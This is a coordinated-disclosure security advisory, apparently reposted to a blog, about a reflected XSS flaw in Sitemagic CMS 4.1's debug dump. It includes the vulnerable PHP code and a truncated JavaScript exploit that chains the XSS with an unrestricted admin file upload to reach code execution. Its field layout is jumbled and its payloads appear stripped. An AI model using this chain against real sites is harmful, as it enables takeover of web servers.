Security Advisory - Curesec Research Team 1. Introduction Affected Sitemagic CMS 4.1 Product: Fixed in: 4.1.1 Fixed Version http://ift.tt/1MIfaTR Link: SMDownloadsFile=SitemagicCMS411.zip Vendor Contact: dev@sitemagic.org Vulnerability XSS Type: Remote Yes Exploitable: Reported to 09/29/2015 vendor: Disclosed to 11/13/2015 public: Release mode: Coordinated release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview CVSS Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Description If debug is enabled - which it is by default - the values of POST and GET are echoed unencoded, leading to an XSS vulnerability. With this, it is possible to inject JavaScript keyloggers, or to bypass CSRF protection, which in this case may lead to code execution. 3. Proof of Concept http://localhost/Sitemagic/?dump=true&foo='">4. Code index.php if ($debug === true) { $end = microtime(true); if (isset($_REQUEST["dump"]) === true) { $time = $end - $start; echo "
Memory usage: " . memory_get_usage(true) / 1024 . " KB"; echo "
Time usage: " . $time . " seconds"; echo "
POST
" . print_r($_POST, true) . "
GET
" . print_r($_GET, true) . "
"; } } 5. XSS to Code Execution Because the file upload in the admin area does not restrict the file type, an attacker can gain code execution via the XSS vulnerability. http://localhost/Sitemagic/?dump=true&foo=">/s.js: submitRequest(); function submitRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", "http://localhost/Sitemagic/index.php?SMExt=SMFiles&SMTemplateType=Basic&SMExecMode=Dedicated&SMFilesUpload&SMFilesUploadPath=files%2Fimages%2Fdemo", true); xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary
Source: Gmail -> IFTTT-> Blogger
No comments:
Post a Comment